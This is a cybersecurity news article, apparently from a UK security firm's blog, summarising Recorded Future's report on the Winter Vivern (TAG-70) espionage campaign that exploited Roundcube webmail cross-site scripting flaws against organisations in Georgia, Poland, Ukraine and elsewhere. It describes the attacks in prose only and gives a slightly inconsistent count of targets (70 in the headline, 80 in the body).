Cybersecurity News

Roundcube vulnerability being exploited by Russian hackers 😢

Over 70 organisations have been targeted by a sophisticated threat actor based in Belarus and Russia.

Threat actors with ties to Belarus and Russia have been implicated in a recent cyber espionage campaign, which exploited vulnerabilities in Roundcube webmail servers to target over 80 organisations. According to Recorded Future, these targeted entities are predominantly situated in Georgia, Poland, and Ukraine. The campaign has been attributed to a threat actor known as Winter Vivern, also identified as TA473 and UAC0114, tracked by Recorded Future under the name Threat Activity Group 70 (TAG-70).

Winter Vivern’s utilisation of security vulnerabilities in Roundcube and other software was previously highlighted by ESET in October 2023, aligning with similar tactics observed in other Russia-linked threat actor groups such as APT28, APT29, and Sandworm, which commonly target email software.

Notably, Winter Vivern has been active since at least December 2020 and has previously exploited a patched vulnerability in Zimbra Collaboration email software to infiltrate organisations in Moldova and Tunisia in July 2023.

The cyber espionage campaign detected by Recorded Future spanned from early October 2023 to mid-month, with the primary objective of gathering intelligence on European political and military activities. These attacks coincide with additional TAG-70 activity observed against Uzbekistan government mail servers in March 2023.

Recorded Future highlighted the sophisticated nature of TAG-70’s attack methods, which involved leveraging social engineering techniques and exploiting cross-site scripting vulnerabilities in Roundcube webmail servers to gain unauthorised access to targeted mail servers, circumventing the defenses of government and military organisations.

The attack mechanisms include exploiting Roundcube vulnerabilities to deploy JavaScript payloads aimed at exfiltrating user credentials to a command-and-control (C2) server.

Moreover, Recorded Future identified instances of TAG-70 targeting Iranian embassies in Russia and the Netherlands, along with the Georgian Embassy in Sweden. This targeting suggests broader geopolitical interests in assessing Iran’s diplomatic activities, particularly its support for Russia in Ukraine. Similarly, the espionage against Georgian government entities indicates an interest in monitoring Georgia’s aspirations for European Union (EU) and NATO accession.


Hey! Can we make it official? 😘

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. I promise not to spam you, and you can count on me to keep your data safe πŸ˜‡

Related Hacking Guides

Fifteen Steps to maximising firefox privacy πŸ”’βœ…

Download the complete FireFox checklist that I give to my counter-surveillance clients – completely free of charge! I will take you step-by-step through advanced Firefox Configurations that will help you maximise your privacy, security and anonymity.Β 

Enter your details below and I will email it to you straight away. And don’t worry, your data is safe with me πŸ˜‡

Access free subscriber only content 😘

I would love to share my latest ethical hacking, defensive security, OSINT, and anonymity guides with you. But I’ll need you to trust me with something… your email address. Your data will be encrypted and I will never sell it to third parties πŸ˜‡

UK Cybersecurity Company

About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.